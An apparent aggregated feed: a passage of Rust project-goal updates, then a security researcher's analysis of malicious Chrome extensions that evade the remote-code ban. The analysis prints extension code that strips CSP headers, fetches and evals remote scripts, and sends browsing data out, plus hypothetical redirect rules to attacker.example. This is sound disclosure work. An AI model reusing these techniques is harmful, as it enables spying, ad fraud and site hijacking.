  • Work was done to prototype an implementation for async drop but we didn't account for reviewing bandwidth. nikomatsakis has done initial reads and is working with the PR author to get this done in 2025H1. To be clear though, the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don't even have an RFC, and there are lots of unknowns remaining).
  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus; that's on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementation was revealing unstable details, which is currently being resolved;
  • the asm_goto stabilization PR and reference updates are up, excluding the "output" feature;
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilisation.

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface for our representation of const arguments in the type system layer; there is no longer a way to evaluate a const argument without going through our general-purpose type system logic. This was necessary to ensure that we correctly handle equality of the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request adding example searches and adding a search button has been added to the agenda for the rustdoc team next meeting.
  • -Znext-solver=coherence is now stable in version 1.84, with a new update blog post published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was "we want to see the whole picture". Next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on my own writing bandwidth (reach out if you want to help!). Work will continue but the goal won't be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • RFC is done, waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged with only one remaining until a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Work will start on the batching feature of LLVM/Enzyme, which allows Array of Structs and Struct of Arrays vectorisation.
  • There's been a push to add an AMD GPU target to the compiler, which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

[1] As everyone knows, the hardest part of computer science is naming. I think we rocked this one.

Wladimir Palant: Malicious extensions circumvent Google’s remote code ban

As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in the form of a policy but rather a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension's own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.
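
For comparison, here is a minimal sketch of how a volume booster could get by with just the activeTab and scripting permissions, boosting audio only on the tab where the user clicks the toolbar button. This is not the extension's actual code, just an illustration of the alternative design:

chrome.action.onClicked.addListener(async (tab) => {
  // activeTab grants temporary access to this one tab after the user's click.
  await chrome.scripting.executeScript({
    target: { tabId: tab.id },
    func: () => {
      // Route every media element on the page through a gain node to boost its volume.
      const ctx = new AudioContext();
      for (const media of document.querySelectorAll("audio, video")) {
        const source = ctx.createMediaElementSource(media);
        const gain = ctx.createGain();
        gain.gain.value = 2; // 200%
        source.connect(gain).connect(ctx.destination);
      }
    }
  });
});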

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file represent three malicious functions of the extensions.

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.

And if you move your mouse pointer to that button a message shows up:

Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing the Content-Security-Policy header is meant to disable CSP protection on all websites. And removing the X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests, which at first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it receive a malicious script instead – another way to hijack websites.
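
To make that damage potential more concrete, here is a hypothetical sketch of a rule that a server could push through this mechanism. The domains are made up, but the rule shape matches what the declarativeNetRequest API accepts:

chrome.declarativeNetRequest.updateDynamicRules({
  addRules: [{
    id: 1001,
    priority: 1,
    action: {
      type: "redirect",
      // Replace a script the site trusts with one controlled by the attacker.
      redirect: { url: "https://attacker.example/fake-analytics.js" }
    },
    condition: {
      urlFilter: "||trusted-cdn.example/analytics.js",
      resourceTypes: ["script"]
    }
  }]
});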

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around the tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes only allow specific options instead. One option that the developers of these extensions seem to particularly care about is active, which allows opening tabs in the background. This makes me suspect that the point of this feature is displaying pop-under advertisements.
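
A sketch of what such a remotely triggered call boils down to, assuming the pageId from the configuration resolves to a page URL (the variable names here are illustrative, not the extension's actual identifiers):

// pageUrl and options come straight from the server's configuration response.
chrome.tabs.create({
  url: pageUrl,
  active: false, // open the tab in the background, i.e. a classic pop-under
  ...options
});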

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once, instead the support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing is to come here any more.

The payload

After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result is ads that can barely be distinguished from actual search results; here is what I get searching for “amazon” for example:

Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

Screenshot of search results. Above a link titled “Amazon - Import US to Germany” with the domain myus.com. Below an actual Amazon.de link. Both have exactly the same visuals.

Who is behind these extensions?

These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.

Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don't have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knives.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
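    // the downloaded rules are processed here (omitted; see “The bogus rule processing” below)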
    
  }
});

Supposedly, this code downloads a set of site-specific rules. In theory this could be legitimate functionality that isn’t meant to spy on users. The giveaway isn’t merely that the endpoint never produces any really meaningful responses. A legitimate implementation wouldn’t send a unique user ID with the request, it would cut the page address down to the host name (or at least strip all query parameters), and it would cache the response. The latter is something anybody does simply to reduce the load on the endpoint, unless of course the endpoint is being paid for with users’ data.
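For comparison, a rules download that isn’t meant to collect browsing data could look roughly like this (my sketch, not code from any of these extensions): no user ID, only the host name, and a cached response.

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete")
    return;

  // Only the host name is of interest, full addresses never leave the browser
  const host = new URL(tab.url).hostname;

  // Reuse previously downloaded rules for this host instead of asking again
  const cacheKey = "rules:" + host;
  let { [cacheKey]: rules } = await chrome.storage.local.get(cacheKey);
  if (!rules) {
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ host })
    });
    rules = await response.json();
    await chrome.storage.local.set({ [cacheKey]: rules });
  }
});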

The bogus rule processing

Nothing in the section above is new; I already wrote as much in 2023. But either I didn’t take a close look at the rule processing back then or it has become considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules) {
  if ("id" === key || "genericId" === key) {
    // Remove elements by ID
  } else if ("class" === key || "genericClass" === key) {
    // Remove elements by class name
  } else if ("innerText" === key) {
    // Remove elements by text
  } else if ("rules" === key) {
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  } else if ("cc" === key) {
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled
  }
}

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global" the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on a per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse, as we’ve seen already. Given what McAfee discovered about these extensions before, this is likely meant for cookie stuffing, but execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.
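To illustrate, a server-provided rule along the following lines would be all it takes for cookie stuffing (a hypothetical example, the shop domain and affiliate parameter are made up):

applyRules([{
  id: 100,
  priority: 1,
  // Hypothetical targeted shop
  condition: { urlFilter: "||shop.example.com", resourceTypes: ["main_frame"] },
  action: {
    type: "redirect",
    redirect: {
      // Silently attach an affiliate parameter to every visit to the shop
      transform: {
        queryTransform: {
          addOrReplaceParams: [{ key: "ref", value: "attacker-affiliate-id" }]
        }
      }
    }
  }
}], "shop", tabId);

The user never notices anything, yet the shop now attributes their purchases to the extension’s affiliate ID.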

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension, there might be only frame injection or only the adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate under Google’s rules; the others, not so much.

The affected extensions

Name | Weekly active users | Extension ID
Auto Refresh Plus | 100,000 | ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh | 100,000 | fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension | 700,000 | gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons | 20,000 | gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads | 200,000 | hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker | 50,000 | iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser | 10,000 | jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party | 500,000 | mmnbenehknklpbendgmgngeaignppnbe
Free adblocker | 8,000 | njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube | 100,000 | okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos | 30,000 | pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as a representative of the 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either: my post in 2023 already named three of them, even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it, as I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result is three values which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});
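To give an idea of how little code such a property resolution mechanism needs, here is my reconstruction of the general approach (not the extension’s actual code):

function resolvePath(path) {
  // Walk a dotted property path starting at the background worker's global scope,
  // so "chrome.tabs.query" resolves to the chrome.tabs.query function
  return path.split(".").reduce((obj, prop) => obj?.[prop], self);
}

const queryTabs = resolvePath("chrome.tabs.query"); // the decoded value1 from the call above
queryTabs({ url: "chrome://extensions/*" }, result => { /* wipe traces if non-empty */ });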

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as a parameter is a tabs.onUpdated listener, its logic becomes way easier to understand despite the missing parts. The cl key in the extension’s storage (other extensions often use different names) is the event queue where data about the user’s browsing is stored. Once there are at least 10 events, the queue is sent to the same address the extension downloads its configuration from.
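Put together, the listener’s logic roughly corresponds to this sketch (my reconstruction from the obfuscated code; the exact event format and endpoint path are guesses):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete")
    return;

  // Add the visited address to the event queue kept in extension storage
  const { cl = [] } = await chrome.storage.local.get("cl");
  cl.push({ url: tab.url, time: Date.now() });
  await chrome.storage.local.set({ cl });

  // Once at least 10 events accumulated, flush them to the configuration server
  if (cl.length >= 10) {
    await fetch("https://sweet-vpn.com/config", { // hypothetical path on the extension's domain
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(cl)
    });
    await chrome.storage.local.remove("cl");
  }
});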

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page with something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or simply navigating to advertising pages.

The affected extensions

Name | Weekly active users | Extension ID
VK UnBlock. Works fast. | 40,000 | ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master | 120 | akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram | 8,000 | akmlnidakeiaipibeaidhlekfkjamgkm
